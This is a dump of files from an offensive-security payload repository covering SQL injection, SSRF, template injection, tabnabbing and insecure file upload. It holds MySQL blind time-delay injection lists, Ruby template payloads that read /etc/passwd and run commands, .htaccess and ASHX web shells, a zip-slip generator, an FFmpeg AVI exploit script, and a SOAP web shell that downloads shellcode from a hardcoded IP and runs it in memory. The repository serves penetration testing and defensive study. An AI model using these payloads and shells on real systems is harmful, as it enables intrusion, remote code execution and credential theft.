),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 11 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 12 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 13 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 14 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 15 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 16 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 17 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 18 | 
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 19 | -------------------------------------------------------------------------------- /SQL Injection/Intruder/payloads-sql-blind-MySQL-WHERE: -------------------------------------------------------------------------------- 1 | and 0=benchmark(3000000,MD5(1))%20/* 2 | and 0=benchmark(3000000,MD5(1))%20-- 3 | and 0=benchmark(3000000,MD5(1))%20%23 4 | ' and 0=benchmark(3000000,MD5(1))%20/* 5 | ' and 0=benchmark(3000000,MD5(1))%20-- 6 | ' and 0=benchmark(3000000,MD5(1))%20%23 7 | " and 0=benchmark(3000000,MD5(1))%20/* 8 | " and 0=benchmark(3000000,MD5(1))%20-- 9 | " and 0=benchmark(3000000,MD5(1))%20%23 10 | ) and 0=benchmark(3000000,MD5(1))%20/* 11 | ) and 0=benchmark(3000000,MD5(1))%20-- 12 | ) and 0=benchmark(3000000,MD5(1))%20%23 13 | )) and 0=benchmark(3000000,MD5(1))%20/* 14 | )) and 0=benchmark(3000000,MD5(1))%20-- 15 | )) and 0=benchmark(3000000,MD5(1))%20%23 16 | ))) and 0=benchmark(3000000,MD5(1))%20/* 17 | ))) and 0=benchmark(3000000,MD5(1))%20-- 18 | ))) and 0=benchmark(3000000,MD5(1))%20%23 19 | )))) and 0=benchmark(3000000,MD5(1))%20/* 20 | )))) and 0=benchmark(3000000,MD5(1))%20-- 21 | )))) and 0=benchmark(3000000,MD5(1))%20%23 22 | ') and 0=benchmark(3000000,MD5(1))%20/* 23 | ') and 0=benchmark(3000000,MD5(1))%20-- 24 | ') and 0=benchmark(3000000,MD5(1))%20%23 25 | ") and 0=benchmark(3000000,MD5(1))%20/* 26 | ") and 0=benchmark(3000000,MD5(1))%20-- 27 | ") and 0=benchmark(3000000,MD5(1))%20%23 28 | ')) and 0=benchmark(3000000,MD5(1))%20/* 29 | ')) and 0=benchmark(3000000,MD5(1))%20-- 30 | ')) and 0=benchmark(3000000,MD5(1))%20%23 31 | ")) and 0=benchmark(3000000,MD5(1))%20/* 32 | ")) and 0=benchmark(3000000,MD5(1))%20-- 33 | ")) and 0=benchmark(3000000,MD5(1))%20%23 34 | '))) and 0=benchmark(3000000,MD5(1))%20/* 35 | '))) and 0=benchmark(3000000,MD5(1))%20-- 36 | '))) and 0=benchmark(3000000,MD5(1))%20%23 37 | "))) and 0=benchmark(3000000,MD5(1))%20/* 38 | "))) and 
0=benchmark(3000000,MD5(1))%20-- 39 | "))) and 0=benchmark(3000000,MD5(1))%20%23 40 | ')))) and 0=benchmark(3000000,MD5(1))%20/* 41 | ')))) and 0=benchmark(3000000,MD5(1))%20-- 42 | ')))) and 0=benchmark(3000000,MD5(1))%20%23 43 | ")))) and 0=benchmark(3000000,MD5(1))%20/* 44 | ")))) and 0=benchmark(3000000,MD5(1))%20-- 45 | ")))) and 0=benchmark(3000000,MD5(1))%20%23 46 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/SSRF_expect.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/SSRF_url.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_ffmpeg.avi: -------------------------------------------------------------------------------- 1 | #EXTM3U 2 | #EXT-X-MEDIA-SEQUENCE:0 3 | #EXTINF:1.0 4 | http://ssrfevil.com 5 | #EXT-X-ENDLIST -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_iframe.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_css_import.svg: -------------------------------------------------------------------------------- 1 | 2 | 5 | 7 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_css_link.svg: -------------------------------------------------------------------------------- 1 | 3 | 4 | 6 | -------------------------------------------------------------------------------- /Server Side Request 
Forgery/Files/ssrf_svg_css_xmlstylesheet.svg: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_image.svg: -------------------------------------------------------------------------------- 1 | 3 | 4 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Files/ssrf_svg_use.svg: -------------------------------------------------------------------------------- 1 | 3 | 4 | -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/Parser and Curl less than 7.54.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Server Side Request Forgery/Images/Parser and Curl less than 7.54.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/SSRF_PDF.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Server Side Request Forgery/Images/SSRF_PDF.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/SSRF_Parser.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Server Side Request Forgery/Images/SSRF_Parser.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/SSRF_stream.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Server Side Request Forgery/Images/SSRF_stream.png -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/WeakParser.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Server Side Request Forgery/Images/WeakParser.jpg -------------------------------------------------------------------------------- /Server Side Request Forgery/Images/aws-cli.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Server Side Request Forgery/Images/aws-cli.jpg -------------------------------------------------------------------------------- /Server Side Template Injection/ASP.md: -------------------------------------------------------------------------------- 1 | # Server Side Template Injection - ASP.NET 2 | 3 | > Server-Side Template Injection (SSTI) is a class of vulnerabilities in which attacker-controlled input is embedded into a server-side template and evaluated by the template engine, which can lead to arbitrary code execution on the server. In the context of ASP.NET, SSTI can occur when user input is embedded directly into a template (Razor, ASPX, or another templating engine) without proper sanitization.
4 | 5 | ## Summary 6 | 7 | - [ASP.NET Razor](#aspnet-razor) 8 | - [ASP.NET Razor - Basic Injection](#aspnet-razor---basic-injection) 9 | - [ASP.NET Razor - Command Execution](#aspnet-razor---command-execution) 10 | - [References](#references) 11 | 12 | ## ASP.NET Razor 13 | 14 | [Official website](https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/introducing-razor-syntax-c) 15 | 16 | > Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages. 17 | 18 | ### ASP.NET Razor - Basic Injection 19 | 20 | ```powershell 21 | @(1+2) 22 | ``` 23 | 24 | ### ASP.NET Razor - Command Execution 25 | 26 | ```csharp 27 | @{ 28 | // C# code 29 | } 30 | ``` 31 | 32 | ## References 33 | 34 | - [Server-Side Template Injection (SSTI) in ASP.NET Razor - Clément Notin - April 15, 2020](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/) 35 | -------------------------------------------------------------------------------- /Server Side Template Injection/Images/serverside.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Server Side Template Injection/Images/serverside.png -------------------------------------------------------------------------------- /Server Side Template Injection/Images/template-library.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Server Side Template Injection/Images/template-library.jpg -------------------------------------------------------------------------------- /Server Side Template Injection/Ruby.md: -------------------------------------------------------------------------------- 1 | # Server Side Template Injection - Ruby 2 | 3 | > Server-Side Template Injection 
(SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Ruby, SSTI can occur when using templating engines like ERB (Embedded Ruby), Haml, liquid, or Slim, especially when user input is incorporated into templates without proper sanitization or validation. 4 | 5 | ## Summary 6 | 7 | - [Templating Libraries](#templating-libraries) 8 | - [Ruby](#ruby) 9 | - [Ruby - Basic injections](#ruby---basic-injections) 10 | - [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd) 11 | - [Ruby - List files and directories](#ruby---list-files-and-directories) 12 | - [Ruby - Remote Command execution](#ruby---remote-command-execution) 13 | - [References](#references) 14 | 15 | ## Templating Libraries 16 | 17 | | Template Name | Payload Format | 18 | | ------------ | --------- | 19 | | Erb | `<%= %>` | 20 | | Erubi | `<%= %>` | 21 | | Erubis | `<%= %>` | 22 | | HAML | `#{ }` | 23 | | Liquid | `{{ }}` | 24 | | Mustache | `{{ }}` | 25 | | Slim | `#{ }` | 26 | 27 | ## Ruby 28 | 29 | ### Ruby - Basic injections 30 | 31 | **ERB**: 32 | 33 | ```ruby 34 | <%= 7 * 7 %> 35 | ``` 36 | 37 | **Slim**: 38 | 39 | ```ruby 40 | #{ 7 * 7 } 41 | ``` 42 | 43 | ### Ruby - Retrieve /etc/passwd 44 | 45 | ```ruby 46 | <%= File.open('/etc/passwd').read %> 47 | ``` 48 | 49 | ### Ruby - List files and directories 50 | 51 | ```ruby 52 | <%= Dir.entries('/') %> 53 | ``` 54 | 55 | ### Ruby - Remote Command execution 56 | 57 | Execute code using SSTI for **Erb**,**Erubi**,**Erubis** engine. 58 | 59 | ```ruby 60 | <%=(`nslookup oastify.com`)%> 61 | <%= system('cat /etc/passwd') %> 62 | <%= `ls /` %> 63 | <%= IO.popen('ls /').readlines() %> 64 | <% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%> 65 | <% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%> 66 | ``` 67 | 68 | Execute code using SSTI for **Slim** engine. 
69 | 70 | ```ruby 71 | #{ %x|env| } 72 | ``` 73 | 74 | ## References 75 | 76 | - [Ruby ERB Template Injection - Scott White & Geoff Walton - September 13, 2017](https://web.archive.org/web/20181119170413/https://www.trustedsec.com/2017/09/rubyerb-template-injection/) 77 | -------------------------------------------------------------------------------- /Tabnabbing/README.md: -------------------------------------------------------------------------------- 1 | # Tabnabbing 2 | 3 | > Reverse tabnabbing is an attack where a page linked from the target page is able to rewrite that page, for example to replace it with a phishing site. As the user was originally on the correct page they are less likely to notice that it has been changed to a phishing site, especially if the site looks the same as the target. If the user authenticates to this new page then their credentials (or other sensitive data) are sent to the phishing site rather than the legitimate one. 4 | 5 | ## Summary 6 | 7 | * [Tools](#tools) 8 | * [Methodology](#methodology) 9 | * [Exploit](#exploit) 10 | * [Discover](#discover) 11 | * [References](#references) 12 | 13 | ## Tools 14 | 15 | * [PortSwigger/discovering-reversetabnabbing](https://portswigger.net/bappstore/80eb8fd46bf847b4b17861482c2f2a30) - Discovering Reverse Tabnabbing 16 | 17 | ## Methodology 18 | 19 | When looking for tabnabbing, the attacker searches for links that are inserted into the website and are under his control; such links may be contained in a forum post, for example. Once he has found this kind of functionality, he checks that the link's `rel` attribute does not contain the value `noopener` and that the `target` attribute contains the value `_blank`. If this is the case, the website is vulnerable to tabnabbing. Note that current browsers treat `target="_blank"` as implying `rel="noopener"` by default, so the attack mainly succeeds against older browsers or against links that explicitly set `rel="opener"`; the mitigation remains to add `rel="noopener noreferrer"` to every link whose destination is not fully trusted. 20 | 21 | ## Exploit 22 | 23 | 1. Attacker posts a link to a website under his control that contains the following JS code: `window.opener.location = "http://evil.com"` 24 | 2. 
He tricks the victim into visiting the link, which is opened in the browser in a new tab. 25 | 3. When the new tab loads, the JS code executes and redirects the original (background) tab to the website evil.com, which is most likely a phishing website. 26 | 4. If the victim returns to the background tab without looking at the address bar, he may believe he has been logged out, because a login page appears, for example. 27 | 5. The victim tries to log on again and the attacker receives the credentials. 28 | 29 | ## Discover 30 | 31 | Search for the following link formats: 32 | 33 | ```html 34 | 35 | 36 | ``` 37 | 38 | ## References 39 | 40 | * [Reverse Tabnabbing - OWASP - October 20, 2020](https://owasp.org/www-community/attacks/Reverse_Tabnabbing) 41 | * [Tabnabbing - Wikipedia - May 25, 2010](https://en.wikipedia.org/wiki/Tabnabbing) 42 | -------------------------------------------------------------------------------- /Type Juggling/Images/table_representing_behavior_of_PHP_with_loose_type_comparisons.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Type Juggling/Images/table_representing_behavior_of_PHP_with_loose_type_comparisons.png -------------------------------------------------------------------------------- /Upload Insecure Files/CVE FFmpeg HLS/gen_avi_bypass.py: -------------------------------------------------------------------------------- 1 | import struct 2 | import argparse 3 | 4 | AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI 
LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LISTt\x00\x00\x00strlstrh8\x00\x00\x00txts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00\x86\x03\x00\x00\x10'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\xa0\x00strf(\x00\x00\x00(\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x01\x00\x18\x00XVID\x00H\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LIST movi" 5 | 6 | 7 | def make_txt_packet(content, fake_packets=50, fake_packet_len=200): 8 | content = b'GAB2\x00\x02\x00' + b'\x00' * 10 + content 9 | packet = b'00tx' + struct.pack(' 6 | Order allow,deny 7 | Allow from all 8 | 9 | 10 | # Make .htaccess file be interpreted as php file. This occur after apache has interpreted 11 | # the apache directoves from the .htaccess file 12 | AddType application/x-httpd-php .htaccess 13 | 14 | ###### SHELL ###### &1"); ?>###### LLEHS ###### 15 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo: -------------------------------------------------------------------------------- 1 | AddType application/x-httpd-php .htaccess 2 | # 3 | SetHandler server-status 4 | SetHandler server-info 5 | 6 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Apache .htaccess/.htaccess_rce_files: -------------------------------------------------------------------------------- 1 | AddType application/x-httpd-php .rce -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell: 
-------------------------------------------------------------------------------- 1 | # htaccess backdoor shell 2 | # this is relatively stealthy compared to a typical webshell 3 | 4 | # overriding deny rule 5 | # making htaccess accessible from the internet 6 | # without this you'll get a HTTP 403 7 | 8 | Require all granted 9 | Order allow,deny 10 | Allow from all 11 | 12 | 13 | # Make the server treat .htaccess file as .php file 14 | AddType application/x-httpd-php .htaccess 15 | 16 | # 17 | 18 | # To execute commands you would navigate to: 19 | # http://vulnerable.com/.htaccess?cmd=YourCommand 20 | 21 | # If system(); isnt working then try other syscalls 22 | # e.g. passthru(); shell_exec(); etc 23 | # If you still cant execute syscalls, try bypassing php.ini via htaccess 24 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration IIS web.config/web.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 66 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-admin-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-admin-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-conf-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-conf-__init__.py.zip 
-------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-config-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-config-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-controllers-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-controllers-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-generate-init.py: -------------------------------------------------------------------------------- 1 | # Generating "evil" zip file 2 | # Based on the work of Ajin Abraham 3 | # Vuln website : https://github.com/ajinabraham/bad_python_extract 4 | # More info : https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution 5 | 6 | # Warning 1: need a restart from the server OR debug=True 7 | # Warning 2: you won't get the output of the command (blind rce) 8 | import zipfile 9 | 10 | directories = ["conf", "config", "settings", "utils", "urls", "view", "tests", "scripts", "controllers", "modules", "models", "admin", "login"] 11 | for d in directories: 12 | name = "python-"+d+"-__init__.py.zip" 13 | zipf = zipfile.ZipFile(name, 'w', zipfile.ZIP_DEFLATED) 14 | zipf.close() 15 | z_info = zipfile.ZipInfo(r"../"+d+"/__init__.py") 16 | z_file = zipfile.ZipFile(name, mode="w") # "/home/swissky/Bureau/"+ 17 | 
z_file.writestr(z_info, "import os;print 'Shell';os.system('ls');") 18 | z_info.external_attr = 0o777 << 16 19 | z_file.close() 20 | -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-login-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-login-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-models-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-models-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-modules-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-modules-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-scripts-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-scripts-__init__.py.zip -------------------------------------------------------------------------------- /Upload 
Insecure Files/Configuration Python __init__.py/python-settings-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-settings-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-tests-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-tests-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-urls-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-urls-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-utils-__init__.py.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-utils-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration Python __init__.py/python-view-__init__.py.zip: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/aaf6bdf394fe0bf674c1a0c88d6459daca6b1573/Upload Insecure Files/Configuration Python __init__.py/python-view-__init__.py.zip -------------------------------------------------------------------------------- /Upload Insecure Files/Configuration uwsgi.ini/uwsgi.ini: -------------------------------------------------------------------------------- 1 | [uwsgi] 2 | ; read from a symbol 3 | foo = @(sym://uwsgi_funny_function) 4 | ; read from binary appended data 5 | bar = @(data://[REDACTED]) 6 | ; read from http 7 | test = @(http://[REDACTED]) 8 | ; read from a file descriptor 9 | content = @(fd://[REDACTED]) 10 | ; read from a process stdout 11 | body = @(exec://whoami) 12 | ; call a function returning a char * 13 | characters = @(call://uwsgi_func) -------------------------------------------------------------------------------- /Upload Insecure Files/EICAR/eicar.txt: -------------------------------------------------------------------------------- 1 | X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension ASP/shell.ashx: -------------------------------------------------------------------------------- 1 | <% @ webhandler language="C#" class="AverageHandler" %> 2 | 3 | using System; 4 | using System.Web; 5 | using System.Diagnostics; 6 | using System.IO; 7 | 8 | public class AverageHandler : IHttpHandler 9 | { 10 | /* .Net requires this to be implemented */ 11 | public bool IsReusable 12 | { 13 | get { return true; } 14 | } 15 | 16 | /* main executing code */ 17 | public void ProcessRequest(HttpContext ctx) 18 | { 19 | Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" + HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl); 20 | string command = HttpUtility.ParseQueryString(url.Query).Get("cmd"); 21 | 22 | ctx.Response.Write("
Command:
"); 23 | ctx.Response.Write("
"); 24 | ctx.Response.Write("
");
25 | 
26 |     /* command execution and output retrieval */
27 |     ProcessStartInfo psi = new ProcessStartInfo();
28 |     psi.FileName = "cmd.exe";
29 |     psi.Arguments = "/c "+command;
30 |     psi.RedirectStandardOutput = true;
31 |     psi.UseShellExecute = false;
32 |     Process p = Process.Start(psi);
33 |     StreamReader stmrdr = p.StandardOutput;
34 |     string s = stmrdr.ReadToEnd();
35 |     stmrdr.Close();
36 | 
37 |     ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s));
38 |     ctx.Response.Write("
"); 39 | ctx.Response.Write("
"); 40 | ctx.Response.Write("By
@Hypn, for educational purposes only."); 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension ASP/shell.soap: -------------------------------------------------------------------------------- 1 | <%@ WebService Language="C#" class="SoapStager"%> 2 | using System; 3 | using System.IO; 4 | using System.Web; 5 | using System.Web.Services; 6 | using System.Net; 7 | using System.Net.NetworkInformation; 8 | using System.Net.Security; 9 | 10 | // SRC: https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap 11 | // https://github.com/0xbad53c/webshells/tree/main/iis 12 | 13 | [WebService(Namespace = "http://microsoft.com/" ,Description ="SOAP Stager Webshell" , Name ="SoapStager")] 14 | [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] 15 | public class SoapStager : MarshalByRefObject 16 | { 17 | private static Int32 MEM_COMMIT=0x1000; 18 | private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; 19 | 20 | [System.Runtime.InteropServices.DllImport("kernel32")] 21 | private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect); 22 | 23 | [System.Runtime.InteropServices.DllImport("kernel32")] 24 | private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId); 25 | 26 | 27 | [System.ComponentModel.ToolboxItem(false)] 28 | [WebMethod] 29 | public string loadStage() 30 | { 31 | string Url = "http://10.90.255.52/beacon.bin"; //your IP and location of meterpreter or other raw shellcode 32 | byte[] rzjUFlLZh; 33 | 34 | IWebProxy defaultWebProxy = WebRequest.DefaultWebProxy; 35 | defaultWebProxy.Credentials = CredentialCache.DefaultCredentials; 36 | 37 | // in case of HTTPS 38 | using (WebClient webClient = new WebClient() { Proxy = defaultWebProxy }) 39 | { 40 | ServicePointManager.SecurityProtocol = 
(SecurityProtocolType)3072; 41 | ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return true; }); 42 | webClient.UseDefaultCredentials = true; 43 | rzjUFlLZh = webClient.DownloadData(Url); 44 | } 45 | 46 | 47 | // Feel free to improve to PAGE_READWRITE & direct syscalls for more evasion 48 | IntPtr fvYV5t = VirtualAlloc(IntPtr.Zero,(UIntPtr)rzjUFlLZh.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); 49 | System.Runtime.InteropServices.Marshal.Copy(rzjUFlLZh,0,fvYV5t,rzjUFlLZh.Length); 50 | IntPtr owlqRoQI_ms = IntPtr.Zero; 51 | IntPtr vnspR2 = CreateThread(IntPtr.Zero,UIntPtr.Zero,fvYV5t,IntPtr.Zero,0,ref owlqRoQI_ms); 52 | 53 | return "finished"; 54 | } 55 | } -------------------------------------------------------------------------------- /Upload Insecure Files/Extension ASP/shell.xamlx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | [System.Diagnostics.Process.Start("cmd.exe", "/c calc").toString()] 11 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension HTML/xss.html: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/extensions.lst: -------------------------------------------------------------------------------- 1 | .jpeg.php 2 | .jpg.php 3 | .png.php 4 | .php 5 | .php3 6 | .php4 7 | .php5 8 | .php7 9 | .php8 10 | .pht 11 | .phar 12 | .phpt 13 | .pgif 14 | .phtml 15 | .phtm 16 | .php%00.gif 17 | .php\x00.gif 18 | .php%00.png 19 | .php\x00.png 20 | .php%00.jpg 21 | .php\x00.jpg 22 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/php-script-tag.php: -------------------------------------------------------------------------------- 
1 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.jpg.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.phar: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php3: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php4: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php5: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php7: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.php8: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PHP/phpinfo.phpt: -------------------------------------------------------------------------------- 1 | 2 | 
